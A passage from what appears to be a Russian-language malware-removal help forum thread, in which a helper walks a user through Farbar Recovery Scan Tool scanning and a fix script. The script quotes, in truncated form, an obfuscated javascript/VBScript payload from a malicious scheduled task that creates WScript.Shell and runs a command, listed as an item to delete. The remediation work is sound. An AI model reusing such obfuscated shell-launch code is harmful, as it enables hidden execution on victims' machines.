Перейти к содержанию

Рекомендуемые сообщения

Опубликовано

Здравствуйте!

 

Дополнительно, пожалуйста:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Опубликовано

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    CloseProcesses:
    SystemRestore: On
    CreateRestorePoint:
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ConsoleTesting2016(v.1) — ярлык.lnk [2022-11-06]
    ShortcutTarget: ConsoleTesting2016(v.1) — ярлык.lnk -> C:\Windows\Branding\BenchMarkGSB\ConsoleTesting2016(v.1).exe (Нет файла)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HWiNFO64 — ярлык.lnk [2022-11-06]
    ShortcutTarget: HWiNFO64 — ярлык.lnk -> C:\Windows\Branding\BenchMarkGSB\HWiNFO64.exe (Нет файла)
    Task: {5AB57EC3-A231-4F10-BF1D-E3A5C8A4398E} - System32\Tasks\$sxr-jHwFrjowLDztNScXPPPT => %$sxr-jHwFrjowLDztNScXPPPT4321%  "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x (запись имеет ещё 193 символов). (Нет файла)
    S3 ALSysIO; \??\C:\Users\836D~1\AppData\Local\Temp\ALSysIO64.sys [X] <==== ВНИМАНИЕ
    S3 GPU-Z-v2; \??\C:\Users\836D~1\AppData\Local\Temp\GPU-Z-v2.sys [X] <==== ВНИМАНИЕ
    S3 HWiNFO_160; \??\C:\Users\836D~1\AppData\Local\Temp\HWiNFO64A_160.SYS [X] <==== ВНИМАНИЕ
    S3 HWiNFO_173; \??\C:\Users\836D~1\AppData\Local\Temp\HWiNFO64A_173.SYS [X] <==== ВНИМАНИЕ
    Zip: c:\FRST\Quarantine\
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

На рабочем столе появится архив Date_Time.zip (Дата_Время)
Отправьте его на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

Опубликовано

Хорошо. Ещё просьба - упакуйте в архив с паролем всю папку C:\FRST и отправьте по тому же адресу.

  • 2 недели спустя...
Опубликовано

Да, скачал, спасибо!

В завершение, пожалуйста:

1.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

2.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

  • 2 недели спустя...

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • eosex
      Автор eosex
      CollectionLog-2025.03.25-13.20.zip КАК ЖЕ Я УСТАЛ ОТ ЭТОГО ТРОЯНА((
      у всех по 1 их, а у меня их 6, НЕ 1, А 6!!!
      помогите пожалуйста, логи прикрепил, спасите мои нервы..
    • Aizekelinho
      Автор Aizekelinho
      Касперским был обнаружен вирус MEM:Trojan.win32.SEPEH.gen, после проверки не удаляется, вот логи
      CollectionLog-2025.01.16-19.02.zip
    • krovin
      Автор krovin
      доброго дня. год назад CollectionLog-2023.09.11-14.35.zipскачал архив и только недавно Kaspersky Total Secruity заметил троян. Вроде как лечит, но после перезагрузки он опять работает как svchost.exe сразу как 4-6 службы, нагружая память до 5-7К. логи выше
    • Kapibara
      Автор Kapibara
      Здравствуйте! Сегодня обнаружил сработку c помощью KES 12.5. Объект lsass.exe. При нажатии "Устранить" ничего не происходит, лишь меняется время сработки. Полагаю, где-то есть .exe, который перезапускает этот процесс, но не нашел его. Файл образа автозапуска из Uvs прилагаю.

      2025-04-11_16-52-36_v4.99.12v x64.7z
    • ysomad
      Автор ysomad
      Здравствуйте, каким-то образом словил Win32.SEPEH.gen. Касперский файлы лечит, но он появляется снова и прыгает по разным файлам.
       
       
      Принудительное сканирование этих файлов ничего не дает. KRD тоже ничего не нашел.
      Прикрепляю логи CollectionLog-2025.01.26-21.54.zip
       
      Заранее спасибо за помощь.
×
×
  • Создать...